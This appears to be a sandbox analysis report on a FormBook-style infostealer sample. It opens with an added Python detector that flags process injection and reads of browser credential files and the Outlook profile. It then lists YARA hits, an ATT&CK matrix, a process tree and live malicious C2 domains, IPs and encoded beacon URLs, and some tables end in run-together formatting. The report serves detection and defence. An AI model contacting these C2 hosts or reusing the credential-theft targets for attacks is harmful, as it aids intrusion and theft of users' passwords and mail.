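The lineage recorded in the sections above (COMMERCIAL INVOICES.exe re-launching itself and mapping an execute-and-write section into the dropped oKWoZthfkV.exe; oKWoZthfkV.exe starting taskkill.exe; taskkill.exe mapping an execute-and-write section into firefox.exe, then opening the Chrome and Edge "Login Data", "Cookies" and "Local State" files and the Outlook profile key) is a pattern an endpoint rule can catch without knowing anything about FormBook: a system utility has no business spawning a browser or reading browser credential stores. Added Python example, not code from the report: it replays those observations as a constructed event stream and applies five rules (self-spawn, system utility spawning a browser, RWX section mapped into a foreign process, non-browser process reading browser secret stores, non-mail-client reading the Windows Messaging Subsystem profile key). The event field names, rule names and the browser, mail-client and system-directory lists are assumptions made for the example.

```python
import ntpath
from collections import Counter

# Constructed event stream reproducing the process creations, cross-process
# section mappings, file opens and registry access reported above.
INVOICES = r"C:\Users\user\Desktop\COMMERCIAL INVOICES.exe"
DROPPED = (r"C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL"
           r"\oKWoZthfkV.exe")
TASKKILL = r"C:\Windows\SysWOW64\taskkill.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"
CHROME_PROFILE = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default"
EDGE_PROFILE = r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default"

EVENTS = [
    {"type": "process_create", "parent": INVOICES, "child": INVOICES},
    {"type": "section_map", "source": INVOICES, "target": DROPPED, "protection": "execute and read and write"},
    {"type": "process_create", "parent": DROPPED, "child": TASKKILL},
    {"type": "section_map", "source": TASKKILL, "target": FIREFOX, "protection": "execute and read and write"},
    {"type": "process_create", "parent": TASKKILL, "child": FIREFOX},
    {"type": "file_open", "process": TASKKILL, "path": CHROME_PROFILE + r"\Login Data"},
    {"type": "file_open", "process": TASKKILL, "path": CHROME_PROFILE + r"\Cookies"},
    {"type": "file_open", "process": TASKKILL, "path": EDGE_PROFILE + r"\Login Data"},
    {"type": "file_open", "process": TASKKILL, "path": CHROME_PROFILE + r"\Local State"},
    {"type": "reg_open", "process": TASKKILL,
     "key": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\"},
]

# Assumed allowlists for the example; extend them to the software in your estate.
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe"}
BROWSER_SECRET_FILES = {"login data", "cookies", "web data", "local state"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
MAIL_CLIENTS = {"outlook.exe"}


def image(path):
    """Lower-cased image file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def in_system_dir(path):
    return ntpath.dirname(path).lower() in SYSTEM_DIRS


def ancestry(events, path):
    """Walk process_create records upwards from an image. Stops at a cycle
    (the sample re-launches itself) or when no parent was recorded."""
    parents = {}
    for e in events:
        if e["type"] == "process_create":
            parents.setdefault(image(e["child"]), image(e["parent"]))
    chain, cur = [], image(path)
    while cur is not None and cur not in chain:
        chain.append(cur)
        cur = parents.get(cur)
    return chain


def detect(events):
    """Return (rule, detail) alerts for the injection and theft patterns above."""
    alerts = []
    for e in events:
        t = e["type"]
        if t == "process_create":
            if e["parent"].lower() == e["child"].lower():
                alerts.append(("self_spawn", image(e["child"])))
            if in_system_dir(e["parent"]) and image(e["child"]) in BROWSER_IMAGES:
                alerts.append(("system_utility_spawns_browser", f"{image(e['parent'])} -> {image(e['child'])}"))
        elif t == "section_map":
            prot = e["protection"].lower()
            if "execute" in prot and "write" in prot and e["source"].lower() != e["target"].lower():
                alerts.append(("rwx_section_in_foreign_process", f"{image(e['source'])} -> {image(e['target'])}"))
        elif t == "file_open":
            if ntpath.basename(e["path"]).lower() in BROWSER_SECRET_FILES and image(e["process"]) not in BROWSER_IMAGES:
                alerts.append(("browser_secret_store_read", f"{image(e['process'])}: {e['path']}"))
        elif t == "reg_open":
            if "windows messaging subsystem\\profiles" in e["key"].lower() and image(e["process"]) not in MAIL_CLIENTS:
                alerts.append(("mail_profile_read", image(e["process"])))
    return alerts


def alert_counts(events):
    """Number of alerts per rule, convenient for a quick verdict."""
    return dict(Counter(rule for rule, _ in detect(events)))


if __name__ == "__main__":
    print(" <- ".join(ancestry(EVENTS, FIREFOX)))
    for rule, detail in detect(EVENTS):
        print(f"{rule:32s} {detail}")
```

The file rule deliberately keys on the file name, not the full path, so Chrome and Edge profiles (and the Network\ sub-folder variants listed above) all match; the process allowlist is what keeps the browsers' own legitimate reads quiet.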

            Remote Access Functionality

Source: Yara match | File source: 4.2.COMMERCIAL INVOICES.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.COMMERCIAL INVOICES.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.3899277856.00000000048F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2604198656.0000000005EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3898777340.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3899336059.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2545033489.0000000003F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3899241480.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

MITRE ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the hit count the report attaches to that technique; techniques without a number had no hits)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Process Injection (412); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Masquerading (1); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (41); Process Injection (412); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (4); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: Security Software Discovery (121); Process Discovery (2); Virtualization/Sandbox Evasion (41); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (113); Remote System Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph ID: 1531665, Sample: COMMERCIAL INVOICES.exe, Start date: 11/10/2024, Architecture: WINDOWS, Score: 100

Start
  Network: www.nibcorp.xyz; www.meramhaliyikama.xyz (Performs DNS queries to domains with low reputation); 13 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 6 other signatures
  started: COMMERCIAL INVOICES.exe (3)
    dropped: C:\Users\user\...\COMMERCIAL INVOICES.exe.log, ASCII
    Signatures: Injects a PE file into a foreign processes
    started: COMMERCIAL INVOICES.exe
      Signatures: Maps a DLL or memory area into another process
      injected: oKWoZthfkV.exe
        Signatures: Found direct / indirect Syscall (likely to bypass EDR)
        started: taskkill.exe (13)
          Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
          injected: oKWoZthfkV.exe
            Network: www.facaicloud.top 74.48.31.123, ports 49990, 49991, 49992, TELUS-3CA Canada; www.supox.site 162.0.225.218, ports 50010, 50011, 50012, NAMECHEAP-NETUS Canada; 7 other IPs or domains
            Signatures: Found direct / indirect Syscall (likely to bypass EDR)
          started: firefox.exe

Source | Detection | Scanner | Label | Link
COMMERCIAL INVOICES.exe | 61% | ReversingLabs | ByteCode-MSIL.Trojan.SnakeLogger |
COMMERCIAL INVOICES.exe | 100% | Joe Sandbox ML | |
No Antivirus matches

Source | Detection | Scanner | Label | Link
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.n-paylity.shop | 104.21.42.219 | true | true | | unknown
www.facaicloud.top | 74.48.31.123 | true | true | | unknown
nibcorp.xyz | 3.33.130.190 | true | true | | unknown
wcr5.top | 154.23.184.95 | true | true | | unknown
www.master7.space | 199.59.243.227 | true | true | | unknown
www.supox.site | 162.0.225.218 | true | true | | unknown
www.5711337.xyz | 103.249.106.91 | true | true | | unknown
www.syncsnode.net | 172.67.218.106 | true | true | | unknown
93wxd.top | 206.119.82.147 | true | true | | unknown
natroredirect.natrocdn.com | 85.159.66.93 | true | true | | unknown
www.93wxd.top | unknown | unknown | true | | unknown
www.nibcorp.xyz | unknown | unknown | true | | unknown
www.wcr5.top | unknown | unknown | true | | unknown
www.meramhaliyikama.xyz | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.nibcorp.xyz/qy56/ | true | | unknown
http://www.facaicloud.top/fxh3/?BHNhDJjp=TcdD1jH1CapNlBILQUUL6VPJeSSLh+pbMYQjXnoycmFxozx0bMDFjxvRFdG/tU/CFYGPAPKB1FL/Z2VQy4rjs+2Q8knST/5l8EVmCJfQbrXwTzWaySbdQJ1HTeqiGlwgAw==&KteDo=fX0Hm8kxa | true | | unknown
http://www.meramhaliyikama.xyz/vd6t/?BHNhDJjp=XaiJgAiuFnMEtmZURD8Lc3raCMtFBuupNnQYn/g1mG/l0yZG2F7WlL2GsGHsclNHOTCW0P35DR3+uir5yxADGkXKDk67ta12miPg21T/nG4AWXn5T49Yc7XX4Q8eijQzNQ==&KteDo=fX0Hm8kxa | true | | unknown
http://www.supox.site/ksch/ | true | | unknown
http://www.5711337.xyz/886f/?KteDo=fX0Hm8kxa&BHNhDJjp=F4WdUfqIHBg/HL3skErP7lPVDvUzs0Cr8ZA+Fg9dI3ceouFLqqnQf6dPVZvR/nKMPYrd+0qk5jIF7ORmEYYYOZXDdPSYgHhA7DdWNhIxJ8KzsbpvOzugz6Mfni67awxMIw== | true | | unknown
http://www.93wxd.top/u0td/ | true | | unknown
http://www.nibcorp.xyz/qy56/?BHNhDJjp=uyF2ggZKoDdItulgtu2puoUsvXv1Ogv9q0328ASdq3oqq3YtlZ+hpRVw5nQuFecPffSCq9gTwMP2Kh/GIFjlwtIVkvTjWbsmVqyCPN0loUcEBtHyjsPsgz9KuMJn6hseTA==&KteDo=fX0Hm8kxa | true | | unknown
http://www.syncsnode.net/t97r/?BHNhDJjp=fU68x3PRULyXXLX18Be8OZjG7cRSBQSavMkIge0xVdkIxqx/cDskQThzDXmmTxAsHWtrBQPcDxz3o7UBkP1yUbLOTohuYgETqqTp8AigyDVY+hGioDWRRBsptVM6QvNfSQ==&KteDo=fX0Hm8kxa | true | | unknown
http://www.n-paylity.shop/bk4m/?BHNhDJjp=9ev+IdmnT8REph2CGzrIJ/IsR1IBIoPEgwjA7hGEn4o4y1K06O5g5/jYrWQAF7mhR86KKy+6wQgfy24A0MXqjVprhsrq1Iq/McMaN4BLomsWsjrPI4172Mamgtp349unMg==&KteDo=fX0Hm8kxa | true | | unknown
http://www.n-paylity.shop/bk4m/ | true | | unknown
http://www.syncsnode.net/t97r/ | true | | unknown
http://www.93wxd.top/u0td/?BHNhDJjp=EpjSVPpO4pF17PlQ3DNgKhd2v7ja1FkLRxKjmJiLsn9eFCahEsp5jtnh1y932jU+ck47tHBUUsolNvMtAutbQ5HDaIUs2x8kIyYJtigiYamWvQ0ME/HlpqSu5UMEi5UFjQ==&KteDo=fX0Hm8kxa | true | | unknown
http://www.supox.site/ksch/?BHNhDJjp=J8lzQYDSDIyYjxmyisycdc0dQo+0mdR+IGXfAda7tEE7fn+2GVkWw6+hdf3A0BNElIx5K3urdoerlkCH3feHlz5JfFADuLqaJ1HoxSfDOrbKFf5fEpK5Atk4IzSpx3Ij7g==&KteDo=fX0Hm8kxa | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.5711337.xyz/yingmulin/ | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://duckduckgo.com/chrome_newtab | taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.5711337.xyz/lingyuanaimili/ | oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://duckduckgo.com/ac/?q= | taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.5711337.xyz/Dating/713e6299224.html | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/yasendi/ | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/xiaozaochuanlianzi/ | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/Love/527e6299410.html | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/template/news/mip05/css/style.css | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/Friends/202f799790.html | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/jianaiyouluo/ | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/uploads/images/7115490.jpg | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/Chat/551a999439.html | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/Chat/633f6299304.html | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/shenchuanling/ | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/Chat/891c6299046.html | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/Love/640d6299297.html | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/diya/ | oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/macangyou/ | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/uploads/images/7517550.jpg | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/Marry/616e6299321.html | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/hongyinying/ | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/uploads/images/6782600.jpg | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/changzezi/ | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/uploads/images/6095900.jpg | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/shuicaowenxiang/ | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/Chat/34d6299903.html | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/aiyinmaliya/ | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/Dating/535e6299402.html | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/uploads/images/9237100.jpg | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/limeiyouliya/ | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/Love/564d099435.html | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/uploads/images/3872200.jpg | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/Dating/06b6299931.html | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/uploads/images/2807980.jpg | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/jizemingbu/ | oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/uploads/images/711549.jpg | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/Chat/646e6299291.html | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.5711337.xyz/Friends/875c6299062.html | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/shuiyechaoyang/ | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/Dating/448a6299489.html | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/Chat/607d899384.html | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/xiqijiexika/ | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://www.ecosia.org/newtab/ | taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.5711337.xyz/Friends/005b6299932.html | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/Friends/938e6298999.html | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.5711337.xyz/Friends/287d099712.html | taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
                                                                                                                                                          unknown
                                                                                                                                                          http://www.5711337.xyz/uploads/images/3605400.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://www.5711337.xyz/jinmeixiang/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://www.5711337.xyz/shananfenghua/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://www.5711337.xyz/Chat/341b6299596.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://www.5711337.xyz/uploads/images/4777950.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    http://www.5711337.xyz/Love/070a6299867.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.5711337.xyz/qiaobenyoucai/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        http://www.5711337.xyz/xiaoxiyou/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          http://www.5711337.xyz/xidaoaili/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                            unknown
